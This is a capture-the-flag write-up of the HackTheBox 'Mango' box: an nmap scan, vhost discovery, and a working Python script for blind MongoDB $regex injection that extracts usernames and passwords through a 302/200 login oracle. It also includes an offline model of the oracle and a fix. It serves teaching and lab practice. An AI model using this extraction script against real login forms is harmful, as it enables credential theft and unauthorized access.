HackTheBox-Mango
ssooking

An nmap scan of the common ports shows 22, 80 and 443 open.

```text
# nmap -T4 -sS -sV -sC 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 01:51 EST
Nmap scan report for 10.10.10.162
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds
```

The TLS certificate on port 443 carries the common name staging-order.mango.htb. Add it to /etc/hosts (10.10.10.162 staging-order.mango.htb) and browse to it: the bare IP on port 80 only returns 403 Forbidden, while the staging-order vhost answers on port 80 with the login form that the script below targets.

NoSQL injection script. The login form posts username, password and login to index.php, and the backend forwards the first two into a MongoDB query. Because PHP parses username[$regex]=^a.* into an array, the query becomes {"username": {"$regex": "^a.*"}}. A successful login is answered with a 302 redirect and a failed one with 200, so the regex operator becomes a character-by-character oracle: first enumerate usernames (with password[$regex]=.* so any password matches), then fix the username and extract its password the same way.

```python
#!/usr/bin/env python3
# Blind NoSQL injection against the staging-order.mango.htb login form.
# PHP turns username[$regex]=... into an array, which the backend passes to
# MongoDB as {"username": {"$regex": ...}}. A matching document makes the
# app redirect (302); otherwise it re-renders the form (200). That status
# difference is the oracle used to extract usernames and passwords.

import requests
import string

url = "http://staging-order.mango.htb/index.php"
headers = {"Host": "staging-order.mango.htb"}
# Replace with a current PHPSESSID from your own browser session.
cookies = {"PHPSESSID": "icc5dp0dufeh68mctc9dlne8jd"}

# Letters and digits as-is; punctuation and whitespace backslash-escaped so
# they are matched literally inside the regex.
possible_chars = list(string.ascii_letters) + list(string.digits) + \
    ["\\" + c for c in string.punctuation + string.whitespace]


def logged_in(params):
    """Send one login attempt; True when the server answers with a redirect."""
    r = requests.post(url, data=params, headers=headers, cookies=cookies,
                      allow_redirects=False)
    return r.status_code == 302


def get_usernames():
    usernames = []
    params = {
        "username[$regex]": "",
        "password[$regex]": ".*",   # any password: only the username is tested
        "login": "login",
    }

    # One username per starting character (as in the original script).
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        if not logged_in(params):
            continue
        print("Found username starting with " + c)
        # Extend the prefix until no character continues it.
        while True:
            for c2 in possible_chars:
                params["username[$regex]"] = username + c2 + ".*"
                if logged_in(params):
                    username += c2
                    print(username)
                    break
            else:
                # No character matched: the username is complete.
                print("Found username: " + username[1:])
                usernames.append(username[1:])
                break
    return usernames


def get_password(username):
    print("Extracting password of " + username)
    params = {
        "username": username,       # exact match: only this user's password is tested
        "password[$regex]": "",
        "login": "login",
    }
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            if logged_in(params):
                password += c
                break
        else:
            # Drop the leading "^" and the regex escapes added above (a literal
            # backslash in the password would be dropped as well).
            cleartext = password[1:].replace("\\", "")
            print("Found password " + cleartext + " for username " + username)
            return cleartext


if __name__ == "__main__":
    for u in get_usernames():
        get_password(u)
```
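The script above can only be exercised against the live box. The following is an added example, not code from the original write-up: an offline model of the same $regex login oracle, so the extraction logic can be tested without a target. The users collection and the credentials in it are constructed for the demo, and login() is a hypothetical stand-in for a PHP handler that forwards $_POST['username'] / $_POST['password'] unchanged into a MongoDB find(), where a plain string becomes an equality match and an array such as {"$regex": ...} becomes a query operator. It goes a little beyond the script above: the extractor confirms the end of each value with "$", so a username that is a prefix of another (bob and bobby) is recovered as well, and strict=True models the hardened handler that rejects non-string parameters.

```python
#!/usr/bin/env python3
"""Offline model of a blind MongoDB $regex login oracle (added example)."""
import re
import string

# Constructed sample data standing in for the users collection.
# "bob" is a prefix of "bobby" to show why the end-of-string check matters.
USERS = [
    {"username": "alice", "password": "S3cret!pass"},
    {"username": "bob", "password": "b0b.pw"},
    {"username": "bobby", "password": "{b0bby}$"},
]

ALPHABET = string.ascii_letters + string.digits + string.punctuation + " "


def _match(query_value, field_value):
    """Mimic how MongoDB compares a query value with a document field."""
    if isinstance(query_value, dict):
        if set(query_value) != {"$regex"}:
            raise ValueError("only $regex is modelled here")
        return re.search(query_value["$regex"], field_value) is not None
    return query_value == field_value


def login(username, password, strict=False):
    """True when some document matches, i.e. the app would answer 302.

    strict=True models the hardened (hypothetical) handler, which rejects any
    parameter that is not a plain string (is_string() in PHP) before querying.
    """
    if strict and not (isinstance(username, str) and isinstance(password, str)):
        return False
    return any(_match(username, u["username"]) and _match(password, u["password"])
               for u in USERS)


def enumerate_values(oracle, prefix=""):
    """Depth-first blind extraction of every value the oracle accepts.

    oracle(regex) -> bool. A prefix is confirmed complete with '^prefix$',
    then every one-character extension is probed, so both "bob" and "bobby"
    are recovered; re.escape keeps punctuation literal.
    """
    found = []
    if oracle("^" + re.escape(prefix) + "$"):
        found.append(prefix)
    for c in ALPHABET:
        if oracle("^" + re.escape(prefix + c)):
            found.extend(enumerate_values(oracle, prefix + c))
    return found


def dump_credentials(strict=False):
    """Run the attack end to end; returns {username: password}."""
    creds = {}
    # Username probe: regex on username, ".*" accepts any password.
    names = enumerate_values(
        lambda r: login({"$regex": r}, {"$regex": ".*"}, strict))
    for name in names:
        # Password probe: exact username, regex on password.
        pws = enumerate_values(
            lambda r, n=name: login(n, {"$regex": r}, strict))
        creds[name] = pws[0] if pws else None
    return creds


if __name__ == "__main__":
    print(dump_credentials())             # vulnerable handler: all three accounts
    print(dump_credentials(strict=True))  # hardened handler: {}
```

Against the vulnerable handler dump_credentials() returns all three accounts; with strict=True every probe carries an array parameter, the handler refuses it, and nothing is extracted. Swapping the oracle lambda for a function that POSTs the same regex to a real form and checks for a 302 turns the model into a working client.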

Summary

NoSQL injection: the login form forwards PHP's username[$regex] array parameter into a MongoDB query, and the 302/200 difference on login turns it into a blind oracle for extracting usernames and passwords one character at a time. On the application side the fix is to refuse any parameter that is not a plain string before it reaches the query, so user input can never carry a query operator.

References

https://mp.weixin.qq.com/s/ffHB9ZKWrUQuipWGPD0H5w

  • Post title:HackTheBox-Mango
  • Post author:ssooking
  • Create time:2020-07-17 11:32:00
  • Post link:https://ssooking.github.io/2020/07/hackthebox-mango/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.